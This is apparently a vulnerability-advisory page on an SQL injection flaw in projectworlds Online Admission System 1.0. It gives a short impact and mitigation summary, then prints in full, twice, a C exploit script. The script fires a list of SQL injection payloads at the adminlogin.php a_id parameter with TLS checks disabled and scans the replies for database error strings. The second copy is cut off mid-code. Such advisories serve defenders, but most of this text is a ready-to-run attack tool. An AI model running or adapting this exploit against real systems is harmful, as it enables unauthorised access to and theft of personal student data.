Reconnecting to live updates…

projectworlds Online Admission System 1.0 - SQL Injection

Severity: mediumType: exploit

AI Analysis

Technical Summary

The projectworlds Online Admission System 1.0 suffers from an SQL Injection vulnerability, a common web application security flaw where untrusted input is improperly sanitized before being included in SQL queries. This allows attackers to inject malicious SQL code, potentially enabling unauthorized access to the database, data exfiltration, data manipulation, or even full system compromise depending on database permissions. The vulnerability is specifically in the admission system software, which is typically used by educational institutions to manage student admissions and related data. The exploit code is publicly available and written in the C programming language, indicating that attackers can automate exploitation with crafted requests. Although no active exploitation has been reported, the availability of exploit code lowers the barrier for attackers. The lack of patch links suggests that no official fix has been released, increasing the urgency for organizations to implement mitigations. The vulnerability does not require authentication or user interaction, meaning attackers can exploit it remotely and anonymously, increasing its risk profile. Given the sensitive nature of admission data, including personal and academic records, the impact on confidentiality and integrity is significant. The vulnerability is tagged as medium severity, but the ease of exploitation and potential impact warrant close attention.

Potential Impact

For European organizations, particularly educational institutions using the projectworlds Online Admission System or similar platforms, this vulnerability poses a risk of unauthorized data disclosure, including personal student information, academic records, and possibly financial data. Data integrity could be compromised, leading to altered admission records or fraudulent entries. The availability of the system could also be impacted if attackers execute destructive SQL commands or cause database corruption. Such breaches could lead to regulatory penalties under GDPR due to exposure of personal data, reputational damage, and operational disruptions. The risk is heightened in countries with large numbers of educational institutions relying on this software or where digital transformation in education is advanced. Additionally, attackers could leverage this vulnerability as a foothold for further network intrusion, increasing the overall threat to organizational cybersecurity.

Mitigation Recommendations

Organizations should immediately conduct a thorough code audit of the Online Admission System to identify and remediate SQL Injection points. Implement parameterized queries or prepared statements to ensure user inputs are safely handled. Employ rigorous input validation and sanitization on all user-supplied data. Use web application firewalls (WAFs) configured to detect and block SQL Injection attempts. Monitor logs for unusual database query patterns or failed injection attempts. If possible, isolate the admission system database with strict access controls and least privilege principles. Regularly back up databases to enable recovery in case of compromise. Engage with the software vendor or community to seek patches or updates. Educate developers and administrators on secure coding practices to prevent similar vulnerabilities. Finally, consider penetration testing to validate the effectiveness of mitigations.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland

Indicators of Compromise

exploit-code: /* * Title : projectworlds Online Admission System 1.0 - SQL Injection * Author : Byte Reaper * CVE : CVE-2025-8471 */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include <stdlib.h> #include "argparse.h" #include <time.h> #define FULL 2200 int verbose = 0; int selCookie = 0; const char *cookies; void sleepAssembly(void) { struct timespec s ; s.tv_sec = 0; s.tv_nsec = 500000000; __asm__ volatile ( "mov $35, %%rax\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "D" (&s) : "rax", "rsi", "memory" ); } void syscallLinux() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); syscallLinux(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } int checkLen(int len, char *buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! \e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); syscallLinux(); return 1; } else { printf("\e[0;34m[+] Len Is Not Long.\e[0m\n"); return 0; } return 0; } // Content Log File (Payload, url, full, http code response) int logFile(const char *payload, const char *urlB, long httpCodeResponse,size_t lenResponse) { FILE *file = fopen("result.log", "a"); if (file == NULL) { printf("\e[0;31m[-] Error Create File (result.log)\e[0m\n"); syscallLinux(); return 1; } printf("\e[0;36m[+] Create Log File Successfully.\e[0m\n"); char content[1500]; int lenG = snprintf(content, sizeof(content), "[+] BASE URL : %s\n[+] PAYLOAD Injection : %s\n[+] http code Response %ld\n[+] Response Len : %zu\n\n", urlB, payload, httpCodeResponse, lenResponse); if (checkLen(lenG,content , sizeof(content)) == 1) { printf("\e[0;31m[-] Len Content is Long !\e[0m\n"); syscallLinux(); return 1; } size_t fw = fwrite(content, 1, strlen(content), file); if (fw != strlen(content)) { printf("\e[0;31m[-] Error Write Content in Log file !\e[0m\n"); syscallLinux(); } printf("\e[0;36m[+] Write Log file Content Successfully.\e[0m\n"); fclose(file); if (verbose) { printf("\e[0;33m[+] Close Log File...\e[0m\n"); } return 0; } // Simple Two Stage Injection Payload const char *twoStageInjection[] = { "INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');", "SELECT SLEEP(2);", "SELECT code FROM stages WHERE id = 3;", NULL }; const char *deepInjection_Payload[] = { "'/**/OR/**/1=1--", "'/**/OR/**/'a'='a'--", "'/**/OR/**/1=1/**/AND/**/1=1--", "'/**/OR/**/1=1/**/AND/**/'1'='1'--", "\"/**/OR/**/1=1--", "\"/**/OR/**/1=1/**/AND/**/'a'='a'--", "'/**/UNION/**/SELECT/**/NULL,NULL--", "'/**/AND/**/1=1--", "'/**/AND/**/1=2--", "'/**/AND/**/'1'='1'--", "'/**/AND/**/'1'='2'--", "'/**/AND/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/1=1#", "'/**/OR/**/1=1/*", "'/**/AND/**/1=1/*", "'/**/AND/**/1=2/*", "'/**/OR/**/1=2/*", "'/**/AND/**/SUBSTRING(@@version,1,1)='5'--", "'/**/AND/**/SUBSTRING(@@version,1,1)='8'--", "'/**/OR/**/LOWER(database())/**/LIKE/**/'%test%'--", "'/**/OR/**/1=1/**/ORDER/**/BY/**/1--", NULL }; const char *wordSql[] = { "syntax error", "you have an error in your sql syntax", "warning", "mysql_fetch", "mysql_num_rows", "unclosed quotation mark", "quoted string not properly terminated", "sql syntax error", "unexpected end of sql command", "syntax error near", "database error", "query failed", "error in your query", "unknown column", "cannot execute query", "invalid query", "mysql error", "odbc sql", "sqlstate", "ora-", "sql error", "error occurred", "mysql_fetch_array", "native client", "syntax error in string in query expression", "Microsoft OLE DB Provider for SQL Server", "error message", "warning: mysql", "You have an error in your SQL syntax", NULL }; const char **allTechniques[] = { twoStageInjection, deepInjection_Payload, NULL }; size_t payloadInject(const char *urlP) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem response; response.buffer = NULL; response.len = 0; if (curl == NULL || !curl) { printf("\e[0;31m[-] Error Create Object CURL !\e[0m\n"); syscallLinux(); } if (curl) { char full[FULL]; for (int t = 0; allTechniques[t] != NULL; t++) { const char **payloads = allTechniques[t]; printf("\e[0;35m\n[+] Technique %d:\e[0m\n", t); for (int f = 0; payloads[f] != NULL; f++) { const char *pl = payloads[f]; char *encode = curl_easy_escape(curl, payloads[f], strlen(payloads[f])); if (!encode) { printf("\e[0;31m[-] Error Encode Payload !\e[0m\n"); syscallLinux(); } printf("\e[0;37m[+] Encode Payload : %s\e[0m\n", encode); int lenF = snprintf(full, sizeof(full), "%s/adminlogin.php?a_id=%s",urlP, encode); if (checkLen(lenF, full,sizeof(full)) == 1) { printf("\e[0;31m[-] Len full URL is Long !\e[0m"); syscallLinux(); } printf("\e[0;37m[+] Full URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); if (selCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); curl_free(encode); if (res == CURLE_OK) { long httpCode = 0; logFile(payloads[f], urlP, httpCode, response.len); char *u = NULL; curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &u); printf("\e[0;37m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;32m-> Http Code : %ld\e[0m\n", httpCode); printf("\e[0;35m[+] Check Redirect : ======================\e[0m\n"); if (u) { printf("\e[0;34m[+] Redirect Page Detected .\e[0m\n"); } else { printf("\e[0;31m[-] Redirect Page Not Detected !\e[0m\n"); } printf("\e[0;35m==========================================\e[0m\n"); if (httpCode >= 200 && httpCode < 300) { printf("\e[0;32m[+] Http Code (200 < 300) : %ld\e[0m\n", httpCode); if (verbose) { if (response.buffer) { printf("\e[1;37m\n======================================== [Response ] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;37m\n=============================================================================================\e[0m\n"); } } for (int j = 0; wordSql[j] != NULL; j++) { if (response.buffer) { if (strstr(response.buffer, wordSql[j]) != NULL) { printf("\e[0;34m[+] Word Found In Response \e[0m\n"); printf("\e[0;34m[+] Word : %s\e[0m\n", wordSql[j]); printf("\e[1;35m==================================== [WORD FOUND RESPONSE] ====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===============================================================================================\e[0m\n\n"); } else { printf("\e[0;31m[-] Not Found Word : %s\e[0m\n", wordSql[j]); } } } return response.len; } else { printf("\e[0;31m[-] Negative response code (%ld)!\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(res)); syscallLinux(); } } } curl_easy_cleanup(curl); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } } } size_t simpleRequest(const char *urls) { CURL *curl = curl_easy_init(); struct Mem responseS ; responseS.buffer = NULL; responseS.len = 0; if (curl == NULL || !curl) { syscallLinux(); } if (curl) { char full[FULL]; CURLcode res; int lenS = snprintf(full, sizeof(full), "%s/adminlogin.php", urls ); if (checkLen(lenS, full, sizeof(full)) == 1) { printf("\e[0;31m[-] Error Create Full url (Len is Long)\e[0m\n"); syscallLinux(); } else { printf("\e[0;34m[+] Full URL created successfully.\e[0m\n"); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseS); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); if (verbose) { printf("\e[1;35m------------------------------------------[VERBOSE CURL]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; char host[130]; char ref[150]; char ipDomain[400]; if (sscanf(urls, "%*[^:]://%[^/]", ipDomain) == 1) { printf("\e[0;34m[+] Get Host URL Successfully \e[0m\n"); printf("\e[0;34m[+] HOST Header Content : %s\e[0m\n", ipDomain); headers = curl_slist_append(headers, ipDomain); } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); printf("\e[0;31m[-] Host Header Not modified !\e[0m\n"); printf("\e[0;31m[-] HOST : NULL\e[0m\n"); } headers = curl_slist_append(headers, "Accept: text/html"); headers = curl_slist_append(headers, "Accept-Encoding: gzip"); headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); int lenR = snprintf(ref, sizeof(ref), "Referer: %s", full); if (checkLen(lenR, ref, sizeof(ref)) == 1) { printf("\e[0;31m[-] HEADER Referer Not modified !\n"); printf("\e[0;31m[-] DEFAULT HEADER Referer (http://exemple.com)\n"); headers = curl_slist_append(headers, "Referer: http://example.com"); } else { printf("\e[0;34m[+] Header Referer modified Successfully.\e[0m\n"); printf("\e[0;34m[+] Header Result (Referer) : %s\e[0m\n", ref); headers = curl_slist_append(headers, ref); } headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Connection: keep-alive"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); long code = 0; if (res == CURLE_OK) { curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", code); if (responseS.buffer) { if (verbose) { printf("\e[4;34m========================================= [SIMPLE REQUEST] =========================================\e[0m\n"); printf("%s\n", responseS.buffer); printf("\e[4;34m====================================================================================================\e[0m\n"); } printf("\e[0;34m[+] Regular order length : %zu\e[0m\n", responseS.len); } else { printf("\e[0;31m[-] Response is NULL !\e[0m\n"); } return responseS.len; } else { printf("\e[1;31m[-] Error Send Request !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } if (responseS.buffer) { free(responseS.buffer); responseS.buffer = NULL; responseS.len = 0; } curl_easy_cleanup(curl); } void value(const char *url) { size_t autoLen = simpleRequest(url); printf("\e[0;35m[+] Result Len Size (Regular order) : %zu\e[0m\n",autoLen); size_t lenInjectResponse = payloadInject(url); printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); printf("\e[0;33m[+] Length comparison result (not a definitive criterion for successful injection)\n"); if (autoLen != lenInjectResponse) { printf("\e[0;34m[+] Length not compatible.\e[0m\n"); printf("\e[0;34m[+] Successfully injected via length measurement technique (%zu =! %zu)\n", autoLen,lenInjectResponse); } else { printf("\e[0;31m[-] No difference in length was detected !\e[0m\n"); printf("\e[0;31m[-] The length is similar in normal response and injection response (%zu =! %zu)\e[0m\n", autoLen,lenInjectResponse); } printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); } int main(int argc, const char **argv) { printf( "\e[1;31m" "$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$\\ \n" "$$ __$$\\ $$ | $$ |$$ _____| $$ __$$\\ $$$ __$$\\ $$ __$$\\ $$ ____| $$ __$$\\ $$ | $$ |\\____$$ |$$$$ | \n" "$$ / \\__|$$ | $$ |$$ | \\__/ $$ |$$$$\\ $$ |\\__/ $$ |$$ | $$ / $$ |$$ | $$ | $$ / \\_$$ | \n" "$$ | \\$$\\ $$ |$$$$$\\ $$$$$$\\ $$$$$$ |$$\\$$\\$$ | $$$$$$ |$$$$$$$\\ $$$$$$\\ $$$$$$ |$$$$$$$$ | $$ / $$ | \n" "$$ | \\$$\\$$ / $$ __|\\______|$$ ____/ $$ \\$$$$ |$$ ____/ \\_____$$\\______|$$ __$$< \\_____$$ | $$ / $$ | \n" "$$ | $$\\ \\$$$ / $$ | $$ | $$ |\\$$$ |$$ | $$\\ $$ | $$ / $$ | $$ | $$ / $$ | \n" "\\$$$$$$ | \\$ / $$$$$$$$\\ $$$$$$$$\\ \\$$$$$$ /$$$$$$$$\\ \\$$$$$$ | \\$$$$$$ | $$ |$$ / $$$$$$\\ \n" " \\______/ \\_/ \\________| \\________| \\______/ \\________| \\______/ \\______/ \\_|\\__/ \\______| \n" "\e[1;37m \t\t\t\t\t\t\t\t\t\t\t\t Byte Reaper\n" ); printf("\e[1;31m---------------------------------------------------------------------------------------------------------------------------------------\n"); const char *baseurl = NULL; const char *nameFileC = NULL; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &baseurl, "Enter Target Url (BASE URL)"), OPT_STRING('c', "cookies", &nameFileC, "Enter File cookies"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!baseurl) { printf("\e[1;31m[-] Please Enter target Url !\e[0m\n"); printf("\e[1;31m[-] Example : ./exploit -u http://<TARGET>\e[0m\n"); syscallLinux(); } if (nameFileC) { selCookie = 1; } if (verbose) { verbose = 1; } value(baseurl); return 0; }

projectworlds Online Admission System 1.0 - SQL Injection

Severity: medium

Type: exploit

projectworlds Online Admission System 1.0 - SQL Injection

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland

Indicators of Compromise

exploit-code: /* * Title : projectworlds Online Admission System 1.0 - SQL Injection * Author : Byte Reaper * CVE : CVE-2025-8471 */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include <stdlib.h> #include "argparse.h" #include <time.h> #define FULL 2200 int verbose = 0; int selCookie = 0; const char *cookies; void sleepAssembly(void) { struct timespec s ; s.tv_sec = 0; s.tv_nsec = 500000000; __asm__ volatile ( "mov $35, %%rax\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "D" (&s) : "rax", "rsi", "memory" ); } void syscallLinux() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : :"rax", "rdi" ); } struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { fprintf(stderr, "\e[1;31m[-] Failed to allocate memory!\e[0m\n"); syscallLinux(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } int checkLen(int len, char *buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! \e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); syscallLinux(); return 1; } else { printf("\e[0;34m[+] Len Is Not Long.\e[0m\n"); return 0; } return 0; } // Content Log File (Payload, url, full, http code response) int logFile(const char *payload, const char *urlB, long httpCodeResponse,size_t lenResponse) { FILE *file = fopen("result.log", "a"); if (file == NULL) { printf("\e[0;31m[-] Error Create File (result.log)\e[0m\n"); syscallLinux(); return 1; } printf("\e[0;36m[+] Create Log File Successfully.\e[0m\n"); char content[1500]; int lenG = snprintf(content, sizeof(content), "[+] BASE URL : %s\n[+] PAYLOAD Injection : %s\n[+] http code Response %ld\n[+] Response Len : %zu\n\n", urlB, payload, httpCodeResponse, lenResponse); if (checkLen(lenG,content , sizeof(content)) == 1) { printf("\e[0;31m[-] Len Content is Long !\e[0m\n"); syscallLinux(); return 1; } size_t fw = fwrite(content, 1, strlen(content), file); if (fw != strlen(content)) { printf("\e[0;31m[-] Error Write Content in Log file !\e[0m\n"); syscallLinux(); } printf("\e[0;36m[+] Write Log file Content Successfully.\e[0m\n"); fclose(file); if (verbose) { printf("\e[0;33m[+] Close Log File...\e[0m\n"); } return 0; } // Simple Two Stage Injection Payload const char *twoStageInjection[] = { "INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');", "SELECT SLEEP(2);", "SELECT code FROM stages WHERE id = 3;", NULL }; const char *deepInjection_Payload[] = { "'/**/OR/**/1=1--", "'/**/OR/**/'a'='a'--", "'/**/OR/**/1=1/**/AND/**/1=1--", "'/**/OR/**/1=1/**/AND/**/'1'='1'--", "\"/**/OR/**/1=1--", "\"/**/OR/**/1=1/**/AND/**/'a'='a'--", "'/**/UNION/**/SELECT/**/NULL,NULL--", "'/**/AND/**/1=1--", "'/**/AND/**/1=2--", "'/**/AND/**/'1'='1'--", "'/**/AND/**/'1'='2'--", "'/**/AND/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/EXISTS(SELECT/**/1)--", "'/**/OR/**/1=1#", "'/**/OR/**/1=1/*", "'/**/AND/**/1=1/*", "'/**/AND/**/1=2/*", "'/**/OR/**/1=2/*", "'/**/AND/**/SUBSTRING(@@version,1,1)='5'--", "'/**/AND/**/SUBSTRING(@@version,1,1)='8'--", "'/**/OR/**/LOWER(database())/**/LIKE/**/'%test%'--", "'/**/OR/**/1=1/**/ORDER/**/BY/**/1--", NULL }; const char *wordSql[] = { "syntax error", "you have an error in your sql syntax", "warning", "mysql_fetch", "mysql_num_rows", "unclosed quotation mark", "quoted string not properly terminated", "sql syntax error", "unexpected end of sql command", "syntax error near", "database error", "query failed", "error in your query", "unknown column", "cannot execute query", "invalid query", "mysql error", "odbc sql", "sqlstate", "ora-", "sql error", "error occurred", "mysql_fetch_array", "native client", "syntax error in string in query expression", "Microsoft OLE DB Provider for SQL Server", "error message", "warning: mysql", "You have an error in your SQL syntax", NULL }; const char **allTechniques[] = { twoStageInjection, deepInjection_Payload, NULL }; size_t payloadInject(const char *urlP) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem response; response.buffer = NULL; response.len = 0; if (curl == NULL || !curl) { printf("\e[0;31m[-] Error Create Object CURL !\e[0m\n"); syscallLinux(); } if (curl) { char full[FULL]; for (int t = 0; allTechniques[t] != NULL; t++) { const char **payloads = allTechniques[t]; printf("\e[0;35m\n[+] Technique %d:\e[0m\n", t); for (int f = 0; payloads[f] != NULL; f++) { const char *pl = payloads[f]; char *encode = curl_easy_escape(curl, payloads[f], strlen(payloads[f])); if (!encode) { printf("\e[0;31m[-] Error Encode Payload !\e[0m\n"); syscallLinux(); } printf("\e[0;37m[+] Encode Payload : %s\e[0m\n", encode); int lenF = snprintf(full, sizeof(full), "%s/adminlogin.php?a_id=%s",urlP, encode); if (checkLen(lenF, full,sizeof(full)) == 1) { printf("\e[0;31m[-] Len full URL is Long !\e[0m"); syscallLinux(); } printf("\e[0;37m[+] Full URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); if (selCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepAssembly(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); curl_free(encode); if (res == CURLE_OK) { long httpCode = 0; logFile(payloads[f], urlP, httpCode, response.len); char *u = NULL; curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &u); printf("\e[0;37m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;32m-> Http Code : %ld\e[0m\n", httpCode); printf("\e[0;35m[+] Check Redirect : ======================\e[0m\n"); if (u) { printf("\e[0;34m[+] Redirect Page Detected .\e[0m\n"); } else { printf("\e[0;31m[-] Redirect Page Not Detected !\e[0m\n"); } printf("\e[0;35m==========================================\e[0m\n"); if (httpCode >= 200 && httpCode < 300) { printf("\e[0;32m[+] Http Code (200 < 300) : %ld\e[0m\n", httpCode); if (verbose) { if (response.buffer) { printf("\e[1;37m\n======================================== [Response ] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;37m\n=============================================================================================\e[0m\n"); } } for (int j = 0; wordSql[j] != NULL; j++) { if (response.buffer) { if (strstr(response.buffer, wordSql[j]) != NULL) { printf("\e[0;34m[+] Word Found In Response \e[0m\n"); printf("\e[0;34m[+] Word : %s\e[0m\n", wordSql[j]); printf("\e[1;35m==================================== [WORD FOUND RESPONSE] ====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===============================================================================================\e[0m\n\n"); } else { printf("\e[0;31m[-] Not Found Word : %s\e[0m\n", wordSql[j]); } } } return response.len; } else { printf("\e[0;31m[-] Negative response code (%ld)!\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(res)); syscallLinux(); } } } curl_easy_cleanup(curl); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } } } size_t simpleRequest(const char *urls) { CURL *curl = curl_easy_init(); struct Mem responseS ; responseS.buffer = NULL; responseS.len = 0; if (curl == NULL || !curl) { syscallLinux(); } if (curl) { char full[FULL]; CURLcode res; int lenS = snprintf(full, sizeof(full), "%s/adminlogin.php", urls ); if (checkLen(lenS, full, sizeof(full)) == 1) { printf("\e[0;31m[-] Error Create Full url (Len is Long)\e[0m\n"); syscallLinux(); } else { printf("\e[0;34m[+] Full URL created successfully.\e[0m\n"); } curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseS); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); if (verbose) { printf("\e[1;35m------------------------------------------[VERBOSE CURL]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *headers = NULL; char host[130]; char ref[150]; char ipDomain[400]; if (sscanf(urls, "%*[^:]://%[^/]", ipDomain) == 1) { printf("\e[0;34m[+] Get Host URL Successfully \e[0m\n"); printf("\e[0;34m[+] HOST Header Content : %s\e[0m\n", ipDomain); headers = curl_slist_append(headers, ipDomain); } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); printf("\e[0;31m[-] Host Header Not modified !\e[0m\n"); printf("\e[0;31m[-] HOST : NULL\e[0m\n"); } headers = curl_slist_append(headers, "Accept: text/html"); headers = curl_slist_append(headers, "Accept-Encoding: gzip"); headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); int lenR = snprintf(ref, sizeof(ref), "Referer: %s", full); if (checkLen(lenR, ref, sizeof(ref)) == 1) { printf("\e[0;31m[-] HEADER Referer Not modified !\n"); printf("\e[0;31m[-] DEFAULT HEADER Referer (http://exemple.com)\n"); headers = curl_slist_append(headers, "Referer: http://example.com"); } else { printf("\e[0;34m[+] Header Referer modified Successfully.\e[0m\n"); printf("\e[0;34m[+] Header Result (Referer) : %s\e[0m\n", ref); headers = curl_slist_append(headers, ref); } headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Connection: keep-alive"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); long code = 0; if (res == CURLE_OK) { curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", code); if (responseS.buffer) { if (verbose) { printf("\e[4;34m========================================= [SIMPLE REQUEST] =========================================\e[0m\n"); printf("%s\n", responseS.buffer); printf("\e[4;34m====================================================================================================\e[0m\n"); } printf("\e[0;34m[+] Regular order length : %zu\e[0m\n", responseS.len); } else { printf("\e[0;31m[-] Response is NULL !\e[0m\n"); } return responseS.len; } else { printf("\e[1;31m[-] Error Send Request !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } if (responseS.buffer) { free(responseS.buffer); responseS.buffer = NULL; responseS.len = 0; } curl_easy_cleanup(curl); } void value(const char *url) { size_t autoLen = simpleRequest(url); printf("\e[0;35m[+] Result Len Size (Regular order) : %zu\e[0m\n",autoLen); size_t lenInjectResponse = payloadInject(url); printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); printf("\e[0;33m[+] Length comparison result (not a definitive criterion for successful injection)\n"); if (autoLen != lenInjectResponse) { printf("\e[0;34m[+] Length not compatible.\e[0m\n"); printf("\e[0;34m[+] Successfully injected via length measurement technique (%zu =! %zu)\n", autoLen,lenInjectResponse); } else { printf("\e[0;31m[-] No difference in length was detected !\e[0m\n"); printf("\e[0;31m[-] The length is similar in normal response and injection response (%zu =! 